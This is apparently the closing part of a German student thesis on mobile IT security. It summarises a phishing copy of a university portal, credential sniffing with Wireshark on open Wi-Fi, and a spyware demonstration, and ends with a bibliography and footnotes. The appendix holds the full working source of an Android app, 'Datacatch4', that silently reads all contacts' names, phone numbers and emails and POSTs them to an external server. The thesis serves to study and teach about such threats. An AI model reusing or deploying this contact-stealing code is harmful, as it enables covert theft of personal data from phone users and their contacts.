Durch Cyberkriminalität entstehen jährlich Kosten in Milliardenhöhe, die sich wirtschaftlich gesehen negativ auf die Wohlfahrt der Volkswirtschaft auswirken. Der Fortschritt in der Informationstechnologie hat den ursprünglichen Zwecknutzen, dass es die Anwender in Ihren geschäftlichen und privaten Lebensbereichen unterstützen soll, welches durch unterschiedliche Gefährdungen bedroht ist. Aus dem IT-Grundschutzkatalog wurden die Gefahren aufgelistet und auf einige davon wurde detaillierter eingegangen. Insbesondere in der Branche der mobilen Endgeräte erhöhen sich die Schutznotwendigkeiten aufgrund der Vielzahl an gegeben Nutzmöglichkeiten. Der Markt der mobilen Endgeräte, vor allem die mit dem Betriebssystem Android, steigt rasant an, wodurch es für Angreifer noch lukrativer wird in diesen Bereichen Sicherheitslücken zu Ihrem Vorteil zu nutzen ggf. Anwender zu Fehlhandlungen zu verleiten.
Durch die (Fälschungs-) Phishing-Internetseite des Hochschule Niederrhein Online-Service Portals für Studierende, konnte beispielhaft vorgeführt werden, wie es Cyberkriminellen durch die Ausnutzung der menschlichen Eigenschaften (Social Engineering), mithilfe der Informationstechnologie schaffen, personenbezogene Daten abzugreifen um die Anwender zu schädigen. Der/-Die Studierende wurde auf die falsche Internetseite gelockt, wodurch mit seiner Mithilfe, die Benutzerkennung und das Passwort auf einem externen Server hinterlegt wurden. In dem Kapitel Schadsoftware, in der eine App auf Basis einer Client-Server-Architektur modelliert und programmiert wurde, ist deutlich erkennbar, dass die Wege der Daten Spionage vielfältig sind. In der (Funktions-) und Prozessanalyse wurde verdeutlicht, wie im Hintergrund laufende Prozesse, ohne die Kenntnisnahme der Anwender, Daten aus dem Kontaktverzeichnis abgreifen. Die abgegriffenen Daten wurden in CSV-Dateien konvertiert und als solche auf einem extern angebundenen Server hinterlegt. So war es jederzeit möglich, durch einen PC mit einem Internetzugang und dem Softwareprogramm Microsoft Excel die hinterlegten Informationen zu öffnen und einzusehen.
Da mit der ansteigenden Zahl mobilen Endgeräte Nutzer, auch die Beliebtheit der öffentlichen Hotspotnetzwerke zunimmt, wurde die Funktionsweise und die Sicherheit dieser drahtlosen Netzwerkverbindungen weitgehend untersucht und erörtert. Im Kapitel WLAN wurde verdeutlicht, dass Daten selbst von Personen ohne Fachkenntnisse, in unverschlüsselten öffentlichen Hotspotnetzwerken ausgespäht werden können. Auf der Phishing-Internetseite wurden Benutzerkennung und Passwort eingegeben und mittels einer POST-Methode übermittelt. Nachdem das Softwareprogram „Wireshark“ die ablaufenden Netzwerkprotokolle im WLAN-Netz dokumentierte hatte, musste lediglich die Liste gefiltert, und nach der richtigen Zeile gesucht werden, um die eingegebenen Daten einsehen zu können. Auf das Bluetooth Netzwerkstandard wurde aufgrund der gegebenen Rahmenbedingungen zusammenfassend eingegangen.
Durch die umfassende Analyse und Dokumentation der erwähnten Fallbeispiele, konnten einige Gefahrenbereiche deutlicher erkannt werden. Abschließend konnten, durch die neu hinzugewonnenen Erkenntnisse, einige Gegenmaßnahmen aufgezählt werden.
In dieser Arbeit wurde nur ein Teil bzw. Aspekt der IT-Sicherheit beschrieben.
softwareabhängige Sicherheitslücken werden von dem betreibenden Unternehmen Google kontinuierlich behoben, sobald diese entdeckt werden. Viele Sicherheitsunternehmen und Behörden bemühen sich weiterhin die IT-Sicherheit voranzutreiben und weiterhin zu gewährleisten. Cyberkriminelle entdecken jedoch mit dem Fortschritt stets neue Wege Schutzmaßnahmen zu umgehen und neue Sicherheitslücken/Gefahrenbereiche vorteilhaft auszunutzen. Es muss weiterhin das Ziel die Risiken und Gefahren durch adäquate Maßnahmen auf ein tragbares Maß zu reduzieren verfolgt werden.
Quellenverzeichnis
I. Bücher
Alexander, M: Netzwerke und Netzwerksicherheit Das
Lehrbuch, Wien 2006.
Bullinger, H./ Fähnrich, K.: Betriebliche Informationssysteme Grundlagen
und Werkzeuge der methodischen
Softwareentwicklung, Heidelberg 1997.
Carl, D.: Praxiswissen Ajax, Köln 2006.
Gessler, R. / Krause, T.: Wireless-Netzwerke für den Nahbereich
Eingebettete Funksysteme: Vergleich von
standardisierten und proprietären Verfahren, 2.
Auflage, Wiesbaden 2015.
Lipski, M.: Social Engineering: der Mensch als
Sicherheitsrisiko in der IT, Hamburg 2009.
Mandl, P./Bakomenko, A./ Grundkurs Datenkommunikation
Weiß, J.: TCP/IP—basierte Kommunikation: Grundlagen,
Konzepte und Standards, 2. Auflage, Wiesbaden
2010.
Osterhage, W.: sicher&mobil, Heidelberg 2010.
Roth, J.: Mobile Computing: Grundlagen, Technik,
Konzepte, 2. Auflage, Heidelberg 2005.
Sauter, M.: Grundkurs Mobile Kommunikationssysteme, 4.
Auflage, Wiesbaden 2011.
Scholz, P.: Softwareentwicklung eingebetteter Systeme,
Heidelberg 2005.
Spitz, S./ Pramateftakis, M./ Kryptographie und IT-Sicherheit:
Swoboda, J.: Grundlagen und Anwendungen, 2. Aufl.,
Wiesbaden 2011.
II. Internetquellen
Android: Android Compatibility,
http://source.android.com/compatibility/
index.html, 25.03.2016.
BSI: G5.42 Social Engineering, https://www.bsi.
bund.de/DE/Themen/ITGrundschutz/ITGrundsch
utzKataloge/Inhalt/_content/g/g05/g05042.html,
28.03.2016.
BSI: Aufgaben der Abteilung B,
bteilungB/AbteilungB_node.html, 25.03.2016.
BSI: Aufgaben der Abteilung C,
bteilungC/AbteilungC_node.html, 25.03.2016.
BSI: Aufgaben der Abteilung KT,
bteilungKT/AbteilungKT_node.html, 25.03.2016.
BSI: Aufgaben der Abteilung S,
bteilungS/AbteilungS_node.html, 25.03.2016.
BSI: Aufgaben der Abteilung Z,
bteilungZ/AbteilungZ_node.html, 25.03.2016.
BSI: 4. Woher haben Online-Kriminelle meine E-
Mail-Adresse und mein Passwort?, https://www.
sicherheitstest.bsi.de/faq, 28.03.2016.
BSI: G 5.143 Man-in-the-Middle-Angriff,
hutz/ITGrundschutzKataloge/Inhalt/_content/g/g0
5/g05143.html, 12.04.2016.
BSI: Mobile Engeräte und mobile Applikationen:
Sicherheitsgefährdungen und Schutzmaßnahmen,
2006, https://www.bsi.bund.de/DE/Publikationen/
Broschueren/Mobile/mobileendgeraete.html,
25.03.2016.
BSI: Mobile Engeräte und mobile Applikationen:
Sicherheitsgefährdungen und Schutzmaßnahmen,
hueren/Mobile/mobileendgeraete.html, Seite 6,
03.04.2016.
BSI: Pervasive Computing: Entwicklungen und
Auswirkungen,
2006, https://www.bsi.bund.de/DE/Publikationen/
Studien/Percenta/index_htm.html, 25.03.2016.
BSI: Organisationsübersicht der BSI,
ufgaben_node.html, 03.04.2016.
BSI: Glossar und Begriffsdefinitionen,
hutz/ITGrundschutzKataloge/Inhalt/Glossar/gloss
ar_node.html, 25.03.2016.
BSI: Historie, https://www.bsi.bund.de/DE/
DasBSI/Historie/historie_node.html, 25.03.2016.
BSI: IT-Grundschutz, https://www.bsi.bund.de/
DE/Themen/ITGrundschutz/ITGrundschutzKatal
oge/itgrundschutzkataloge_node.html;jsessionid=
C36C54BD4DF12C1D5AC7018689AABE34.2_
cid368, 03.04. 2016.
BSI: G 0 Elementare Gefährdungen: https://
www.bsi.bund.de/DE/Themen/ITGrundschutz/IT
GrundschutzKataloge/Inhalt/_content/g/g00/g00.
html, 03.04. 2016.
BSI: G 1 Höhere Gewalt, https://www.bsi.bund.de/
DE/Themen/ITGrundschutz/ITGrundschutzKatal
oge/Inhalt/_content/g/g01/g01.html, 03.04. 2016.
BSI: G 2 Organisatorische Mängel, Vgl. BSI: G 1
Höhere Gewalt, https://www.bsi.bund.de/
DE/Themen/ITGrundschutz/ITGrundschutzKatal
oge/Inhalt/_content/g/g02/g02.html, 03.04. 2016.
BSI: Spam, Phishing & Co., https://www.bsi-fuer-
buerger.de/BSIFB/DE/Risiken/SpamPhishingCo/
Phishing/phishing_node.html, 28.03.2016.
BSI: M 2.389 Sichere Nutzung von Hotspots,
hutz/ITGrundschutzKataloge/Inhalt/_content/m/
m02/m02389.html, 01.05.2016.
Bundeskriminalamt: Cybercrime, 2014, http://www.bka.de/
DE/ThemenABisZ/Deliktsbereiche/InternetKrimi
nalitaet/internetKriminalitaet__node.html?__nnn
=true, 25.03.2016.
Developers Android: AsyncTask, http://developer.android.com/
reference/android/os/AsyncTask.html,
28.03.2016.
Gabler Wirtschaftslexikon: Wireless Application Protocol (WAP),
http://wirtschaftslexikon.gabler.de/Definition/wireless
-application-protocol-wap.html, 18.04.2016
GFK: GfK-Ergebnisse anlässlich des Mobile World
Congress zum Gesamtjahr 2012,
http://www.gfk.com/de/insights/press-release/
smartphones-sorgen-fuer-frischen-wind/,
25.03.2015.
Datenschutzbeauftragter-info: MAC-Adressen – Aufbau, Funktion und
Gefahren im Netzwerk, https://www.
datenschutzbeauftragter-info.de/mac-adressen-
aufbau-funktion-und-gefahren-im-netzwerk/,
15.04.2016.
Decker, M. u. a, m-Advertising: Werbung mit mobilen Endgeräten- Ein
Überblick, 2006, S. 104,
http://cs.emis.de/LNI/Proceedings/Proceedings76
/GI-Proceedings-76-9.pdf, 03.04.2016.
Deutsches Institut für Kriminalität in Deutschland, 2015, S. 301,
Wirtschaftsforschung: http://www.diw.de/documents/publikationen/
73/diw_01.c.498298.de/15-12-6.pdf, 25.03.2016.
Developers Android: android.content, http://developer.android.
com/reference/android/content/package-
summary.html, Zugriff am 04.04.2016.
Developers Android: Cursor, http://developer.android.com/
reference/android/database/Cursor.html,
04.04.2016.
Developers Android: ContactsContract, http://developer.android.com/
reference/android/provider/ContactsContract.html
04.04.2016.
Developers Android: ContactsContract.Contacts, http://developer.
android.com/reference/android/provider/Contacts
Contract.Contacts.html, 04.04.2016.
Google: Android Marktplatz – Nutzungsbedingungen,
http://www.google.com/intl/de_at/mobile/android
/market-tos.html, 03.04.2016.
Hotspot: Sichere Datenverbindungen mit VPN,
http://www.hotspot.de/content/vpn.html,
03.05.2016.
Open Source Initiative: The Open Source Definition,
http://opensource.org/docs/osd, 25.03.2016.
Statista: Marktanteile, http://de.statista.com/statistik/daten/
studie/170408/umfrage/marktanteile-der-
betriebssysteme-fuer-smartphones-in-
deutschland/, 25.03.2016.
Verbraucherzentrale: https://www.verbraucherzentrale.de/
Smartphones-Alleskoenner-mit-Risiko,
20.04.2016.
Anhang
Datacatch4 AndroidManifest.xml:
<?xml version=„1.0“ encoding=„utf-8“?>
<manifest xmlns:android=„http://schemas.android.com/apk/res/android“
package=„com.example.datacatch4“
android:versionCode=„1“
android:versionName=„1.0“ >
<uses-sdk
android:minSdkVersion=„14“
android:targetSdkVersion=„19“ />
<uses-permission android:name=„android.permission.INTERNET“ />
<uses-permission android:name=„android.permission.ACCESS_NETWORK_STATE“ />
<uses-permission android:name=„android.permission.READ_CONTACTS“ />
<application
android:allowBackup=„true“
android:icon=„@drawable/ic_launcher“
android:label=„@string/app_name“
android:theme=„@style/AppTheme“ >
<activity
android:name=„.MainActivity“
android:label=„@string/app_name“ >
<intent-filter>
<action android:name=„android.intent.action.MAIN“ />
<category android:name=„android.intent.category.LAUNCHER“ />
</intent-filter>
</activity>
</application>
</manifest>
Datacatch4 activity_main.xml:
<RelativeLayout xmlns:android=„http://schemas.android.com/apk/res/android“
xmlns:tools=„http://schemas.android.com/tools“
android:layout_width=„match_parent“
android:layout_height=„match_parent“
android:paddingBottom=„@dimen/activity_vertical_margin“
android:paddingLeft=„@dimen/activity_horizontal_margin“
android:paddingRight=„@dimen/activity_horizontal_margin“
android:paddingTop=„@dimen/activity_vertical_margin“
tools:context=„com.example.datacatch4.MainActivity“ >
<TextView
android:id=„@+id/tvIsConnected“
android:layout_width=„wrap_content“
android:layout_height=„wrap_content“
android:layout_alignParentTop=„true“
android:layout_centerHorizontal=„true“
android:background=„#FF0000“
android:text=„keine Verbindung!“
android:textColor=„#FFF“
android:textSize=„18dp“ />
<TextView
android:id=„@+id/liste2“
android:layout_width=„wrap_content“
android:layout_height=„wrap_content“
android:layout_below=„@+id/tvIsConnected“
android:layout_centerHorizontal=„true“
android:layout_marginTop=„92dp“
android:text=„Hello World“
android:textAppearance=„?android:attr/textAppearanceLarge“ />
</RelativeLayout>
Datacatch4 Mainactivity.java:
package com.example.datacatch4;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.util.ArrayList;
import java.util.List;
import org.apache.http.NameValuePair;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import com.example.datacatch4.R;
import android.app.Activity;
import android.content.ContentResolver;
import android.database.Cursor;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.os.AsyncTask;
import android.os.Bundle;
import android.provider.ContactsContract;
import android.view.Menu;
import android.view.MenuItem;
import android.widget.TextView;
public class MainActivity extends Activity {
TextView tvIsConnected;
String name;
String phoneNo;
String value;
String email;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
tvIsConnected = (TextView) findViewById(R.id.tvIsConnected);
// Prüft ob Internetverbindung besteht
if(isConnected()){
tvIsConnected.setBackgroundColor(0xFF00CC00);
tvIsConnected.setText(„Verbunden“);
}
else{
tvIsConnected.setText(„Keine Verbindung!“);
}
class MyAsyncTask extends AsyncTask<String, Integer, Double>{
@Override
protected Double doInBackground(String… params) {
// TODO Auto-generated method stub
postData(params[0]);
return null;
}
public void postData(String WertDenIchSendenMöchte) {
HttpClient httpclient = new DefaultHttpClient();
HttpPost httppost = new HttpPost(„http://hsnr.ahisi001.bplaced.net/server.php“);
List<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(2);
//nameValuePairs.add(new BasicNameValuePair(„id“, „12345“));
nameValuePairs.add(new BasicNameValuePair(„message2“, WertDenIchSendenMöchte));
try {
httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));
} catch (UnsupportedEncodingException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
try {
httpclient.execute(httppost);
} catch (ClientProtocolException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}}
ContentResolver cr = getContentResolver();
Cursor cur = cr.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
if (cur.getCount() > 0) {
while (cur.moveToNext()) {
String id = cur.getString(cur.getColumnIndex(ContactsContract.Contacts._ID));
name = cur.getString(cur.getColumnIndex(ContactsContract.Contacts.DISPLAY_NAME));
//– Hier wird die Telefonnummer des dazu gehörigen Kontaktes der variable phoneNo übergeben ———-
Cursor phones = cr.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI,null, ContactsContract.CommonDataKinds.Phone.CONTACT_ID+ “ = ?“, new String[]{id}, null);
while(phones.moveToNext()){
phoneNo = phones.getString(phones.getColumnIndex(ContactsContract.CommonDataKinds.Phone.NUMBER));
}
//– Hier wird die email adresse des dazu gehörigen Kontaktes der variable email übergeben ———–
Cursor emailCur = cr.query(ContactsContract.CommonDataKinds.Email.CONTENT_URI, null, ContactsContract.CommonDataKinds.Email.CONTACT_ID + “ = ?“, new String[]{id}, null);
while (emailCur.moveToNext()) {
email = emailCur.getString(emailCur.getColumnIndex(ContactsContract.CommonDataKinds.Email.DATA));
}
emailCur.close();
phones.close();
//– Hier werden nund die variablen mit ihren Werten der Methode postData übergeben
//– welches per Http-client die Informationen an den Server sendet.
new MyAsyncTask().execute(name + „,“ + phoneNo + „,“ + email);
}
}
}
//——————————-Prüft ob Internetverbindung besteht———————————-
public boolean isConnected(){
ConnectivityManager connMgr = (ConnectivityManager) getSystemService(Activity.CONNECTIVITY_SERVICE);
NetworkInfo networkInfo = connMgr.getActiveNetworkInfo();
if (networkInfo != null && networkInfo.isConnected())
return true;
else
return false;
}
//———————————————————————————————————–
@Override
public boolean onCreateOptionsMenu(Menu menu) {
// Inflate the menu; this adds items to the action bar if it is present.
getMenuInflater().inflate(R.menu.main, menu);
return true;
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
// Handle action bar item clicks here. The action bar will
// automatically handle clicks on the Home/Up button, so long
// as you specify a parent activity in AndroidManifest.xml.
int id = item.getItemId();
if (id == R.id.action_settings) {
return true;
}
return super.onOptionsItemSelected(item);
}
}
1 Vgl. Bundeskriminalamt, Cybercrime, 2014, S. 4 – 5, http://www.bka.de/DE/ThemenABisZ/Deliktsbereiche/InternetKriminalitaet/internetKriminalitaet__node.html?__nnn=true, Zugriff am 25.03.2016.
2 Vgl. Deutsches Institut für Wirtschaftsforschung, Kriminalität in Deutschland, 2015, S. 301, http://www.diw.de/documents/publikationen/73/diw_01.c.498298.de/15-12-6.pdf, Zugriff am 25.03.2016.
3 Vgl. Decker, M. u. a, m-Advertising: Werbung mit mobilen Endgeräten- Ein Überblick, 2006, S. 104, http://cs.emis.de/LNI/Proceedings/Proceedings76/GI-Proceedings-76-9.pdf, Zugriff am 03.04.2016.
4 Vgl. BSI: Mobile Engeräte und mobile Applikationen: Sicherheitsgefährdungen und Schutzmaßnahmen, 2006, https://www.bsi.bund.de/DE/Publikationen/Broschueren/Mobile/
mobileendgeraete.html, Zugriff am 25.03.2016.
5 Vgl. Roth, J.: Mobile Computing: Grundlagen, Technik, Konzepte, 2. Auflage, Heidelberg 2005, S. 7.
6 BSI: Mobile Engeräte und mobile Applikationen: Sicherheitsgefährdungen und Schutzmaßnahmen,https://www.bsi.bund.de/DE/Publikationen/Broschueren/Mobile/mobileendgeraete.html, S. 6, Zugriff am 03.04.2016.
7 Vgl. Bullinger, H./ Fähnrich, K.: Betriebliche Informationssysteme Grundlagen und Werkzeuge der methodischen Softwareentwicklung, Heidelberg 1997, S. 53.
8 Vgl. BSI: Pervasive Computing: Entwicklungen und Auswirkungen, 2006, S. 50, https://www.bsi.bund.de/DE/Publikationen/Studien/Percenta/index_htm.html, Zugriff am 25.03.2016.
9 Scholz, P.: Softwareentwicklung eingebetteter Systeme, Heidelberg 2005, S. 43.
10 Vgl. GFK: GfK-Ergebnisse anlässlich des Mobile World Congress zum Gesamtjahr 2012, http://www.gfk.com/de/insights/press-release/smartphones-sorgen-fuer-frischen-wind/, Zugriff am 25.03.2016.
11 Statista: Marktanteile, http://de.statista.com/statistik/daten/studie/170408/umfrage/marktanteile-der-betriebssysteme-fuer-smartphones-in-deutschland/, Zugriff am: 25.03.2016.
12 Vgl. Android: Android Compatibility, http://source.android.com/compatibility/index.html,
Zugriff am 25.03.2016.
13 Vgl. Google: Android Marktplatz – Nutzungsbedingungen,
http://www.google.com/intl/de_at/mobile/android/market-tos.html, Zugriff am 03.04.2016.
14 Vgl. Open Source Initiative: The Open Source Definition, http://opensource.org/docs/osd,
Zugriff am 25.03.2015.
15 Ebd.
16 Ebd.
17 Ebd.
18 Vgl. Android: Android Open Source Project license,
http://source.android.com/source/licenses.html, Zugriff am 25.03.2016.
19 BSI: Glossar und Begriffsdefinitionen, https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKataloge/Inhalt/Glossar/glossar_node.html, Zugriff am 25.03.2016.
20 Vgl. Spitz, S./ Pramateftakis, M./ Swoboda, J.: Kryptographie und IT-Sicherheit: Grundlagen und Anwendungen, 2. Aufl., Wiesbaden 2011, S. 14 ff.
21 Vgl. BSI: Historie, https://www.bsi.bund.de/DE/DasBSI/Historie/historie_node.html, Zugriff am 25.03.2016.
22 Vgl. BSI: Organisationsübersicht der BSI, https://www.bsi.bund.de/DE/DasBSI/Aufgaben/aufgaben_node.html, Zugriff am 03.04.2016.
23 Vgl. BSI: Aufgaben der Abteilung B, https://www.bsi.bund.de/DE/DasBSI/Aufgaben/AbteilungB/AbteilungB_node.html, Zugriff am 25.03.2015.
24 Vgl. BSI: Aufgaben der Abteilung C, https://www.bsi.bund.de/DE/DasBSI/Aufgaben/AbteilungC/AbteilungC_node.html, Zugriff am 25.03.2016.
25 Vgl. BSI: Aufgaben der Abteilung KT, https://www.bsi.bund.de/DE/DasBSI/Aufgaben/AbteilungKT/AbteilungKT_node.html, Zugriff am 25.03.2016.
26 Vgl. BSI: Aufgaben der Abteilung S, https://www.bsi.bund.de/DE/DasBSI/Aufgaben/AbteilungS/AbteilungS_node.html, Zugriff am 25.03.2016.
27 BSI: Aufgaben der Abteilung Z, https://www.bsi.bund.de/DE/DasBSI/Aufgaben/AbteilungZ/AbteilungZ_node.html, Zugriff am 25.03.2016.
28 Osterhage (2012), Seite 112.
29 Vgl. BSI: IT-Grundschutz, https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKataloge/itgrundschutzkataloge_node.html;jsessionid=C36C54BD4DF12C1D5AC7018689AABE34.2_cid368, Zugriff am 03.04. 2016.
30 Vgl. BSI: G 0 Elementare Gefährdungen: https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKataloge/Inhalt/_content/g/g00/g00.html, Zugriff am 03.04. 2016.
31 Vgl. BSI: G 1 Höhere Gewalt, https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKataloge/Inhalt/_content/g/g01/g01.html, Zugriff am 03.04. 2016.
32 Vgl. BSI: G 2 Organisatorische Mängel, Vgl. BSI: G 1 Höhere Gewalt, https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKataloge/Inhalt/_content/g/g02/g02.html, Zugriff am 03.04. 2016.
33 Vgl. Alexander, M: Netzwerke und Netzwerksicherheit Das Lehrbuch, Wien 2006, S. 81-82.
34 Ebd.
35 Vgl. BSI: 4. Woher haben Online-Kriminelle meine E-Mail-Adresse und mein Passwort?, https://www.sicherheitstest.bsi.de/faq, Zugriff am 28.03.2016.
36 Vgl. Lipski, M.: Social Engineering: der Mensch als Sicherheitsrisiko in der IT, Hamburg 2009, S. 63.
37 Vgl. BSI: G5.42 Social Engineering, https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKataloge/Inhalt/_content/g/g05/g05042.html, Zugriff am 28.03.2016.
38 Ebd.
39 Vgl. BSI: Spam, Phishing & Co., https://www.bsi-fuer-buerger.de/BSIFB/DE/Risiken/SpamPhishingCo/Phishing/phishing_node.html, Zugriff am 28.03.2016.
40 Eigene Darstellung.
41 Eigene Darstellung
42 Eigene Darstellung.
43 Eigene Darstellung
44 Carl, D.: Praxiswissen Ajax, Köln 2006, S. 2 ff.
45 Eigene Darstellung
46 Vgl. Bundeskriminalamt: Cybercrime, 2014, S. 7, http://www.bka.de/DE/ThemenABisZ/Deliktsbereiche/InternetKriminalitaet/internetKriminalitaet__node.html?__nnn=true, Zugriff am 28.03.2016.
47 Eigene Darstellung
48 Eigene Darstellung.
49 Eigene Darstellung.
50 Vgl. Developers Android: AsyncTask, http://developer.android.com/reference/android/os/AsyncTask.html, Zugriff am 28.03.2016.
51 Vgl. Developers Android: AsyncTask, http://developer.android.com/reference/android/os/AsyncTask.html, Zugriff am 04.04.2016.
52 Vgl. Developers Android: android.content, http://developer.android.com/reference/android/content/package-summary.html, Zugriff am 04.04.2016.
53 Vgl. Developers Android: Cursor, http://developer.android.com/reference/android/database/Cursor.html, Zugriff am 04.04.2016.
54 Vgl. Developers Android: ContactsContract, http://developer.android.com/reference/android/provider/ContactsContract.html, Zugriff am 04.04.2016.
55 Vgl. Developers Android: ContactsContract.Contacts, http://developer.android.com/reference/android/provider/ContactsContract.Contacts.html, Zugriff am 04.04.2016.
56 Eigene Darstellung.
57 Eigene Darstellung.
58 Eigene Darstellung.
59 Vgl. Mandl, P./Bakomenko, A./Weiß, J.: Grundkurs Datenkommunikation TCP/IP—basierte Kommunikation: Grundlagen, Konzepte und Standards, 2. Auflage, Wiesbaden 2010, S. 2 ff.
60 Ebd.
61 Ebd.
62 Ebd.
63 Ebd.
64 Ebd.
65 Vgl. Gessler, R. / Krause, T.: Wireless-Netzwerke für den Nahbereich Eingebettete Funksysteme: Vergleich von standardisierten und proprietären Verfahren, 2. Auflage, Wiesbaden 2015, S. 59.
66 Vgl. Mandl, P./Bakomenko, A./Weiß, J.: Grundkurs Datenkommunikation TCP/IP—basierte Kommunikation: Grundlagen, Konzepte und Standards, 2. Auflage, Wiesbaden 2010, S. 3.
67 Vgl. Osterhage, W.: sicher&mobil, Heidelberg 2010, S. 5.
68 Vgl. Sauter, M.: Grundkurs Mobile Kommunikationssysteme, 4. Auflage, Wiesbaden 2011, S. 337.
69 Sauter (2011), S. 338.
70 Sauter, M.: Grundkurs Mobile Kommunikationssysteme, 4. Auflage, Wiesbaden 2011, S. 341.
71 Vgl. ebd.
72 Vgl. Osterhage, W.: sicher&mobil, Heidelberg 2010, S. 47.
73 Vgl. Sauter, M.: Grundkurs Mobile Kommunikationssysteme, 4. Auflage, Wiesbaden 2011, S. 342.
74 Vgl. Osterhage, W.: sicher&mobil, Heidelberg 2010, S. 53.
75 Vgl. Sauter, M.: Grundkurs Mobile Kommunikationssysteme, 4. Auflage, Wiesbaden 2011, S. 387.
76 Ebd.
77 Ebd.
78 Vgl. Gessler, R. / Krause, T.: Wireless-Netzwerke für den Nahbereich Eingebettete Funksysteme: Vergleich von standardisierten und proprietären Verfahren, 2. Auflage, Wiesbaden 2015, S. 276.
79 Vgl. BSI: G 5.143 Man-in-the-Middle-Angriff, https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKataloge/Inhalt/_content/g/g05/g05143.html, Zugriff am 12.04.2016.
80 Gessler, R. / Krause, T.: Wireless-Netzwerke für den Nahbereich Eingebettete Funksysteme: Vergleich von standardisierten und proprietären Verfahren, 2. Auflage, Wiesbaden 2015, S. 65.
81 Eigene Darstellung.
82 Vgl. Sauter, M.: Grundkurs Mobile Kommunikationssysteme, 4. Auflage, Wiesbaden 2011, S. 356.
83 Vgl. Datenschutzbeauftragter-info: MAC-Adressen – Aufbau, Funktion und Gefahren im Netzwerk, https://www.datenschutzbeauftragter-info.de/mac-adressen-aufbau-funktion-und-gefahren-im-netzwerk/, Zugriff am 15.04.2016.
84 Sauter, M.: Grundkurs Mobile Kommunikationssysteme, 4. Auflage, Wiesbaden 2011, S. 355.
85 Eigene Darstellung.
86 Eigene Darstellung.
87 Eigene Darstellung.
88 Vgl. Gessler, R. / Krause, T.: Wireless-Netzwerke für den Nahbereich Eingebettete Funksysteme: Vergleich von standardisierten und proprietären Verfahren, 2. Auflage, Wiesbaden 2015, S. 134 ff.
89 Gessler, R. / Krause, T.: Wireless-Netzwerke für den Nahbereich Eingebettete Funksysteme: Vergleich von standardisierten und proprietären Verfahren, 2. Auflage, Wiesbaden 2015, S. 136.
90 Ebd.
91 Osterhage, W.: sicher&mobil, Heidelberg 2010, S. 140.
92 Gabler Wirtschaftslexikon: Wireless Application Protocol (WAP), http://wirtschaftslexikon.gabler.de/Definition/wireless-application-protocol-wap.html, Zugriff am 18.04.2016
93 Verbraucherzentrale: https://www.verbraucherzentrale.de/Smartphones-Alleskoenner-mit-Risiko, Zugriff am:
20.04.2016.
94 Gabler Wirtschaftslexikon: Wireless Application Protocol (WAP), http://wirtschaftslexikon.gabler.de/Definition/wireless-application-protocol-wap.html, Zugriff am:
95 Eigene Darstellung.
96 BSI: M 2.389 Sichere Nutzung von Hotspots, https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKataloge/Inhalt/_content/m/m02/m02389.html, Zugriff am 01.05.2016.
97 Ebd.
98 Vgl. BSI: M 4.293 Sicherer Betrieb von Hotspots, https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKataloge/Inhalt/_content/m/m04/m04293.html;jsessionid=73052BFA22F2C5DE5CE04F06369A6697.2_cid368?nn=6610630, Zugriff am 01.05.2016.
99 Hotspot: Sichere Datenverbindungen mit VPN, http://www.hotspot.de/content/vpn.html, Zugriff am 03.05.2016.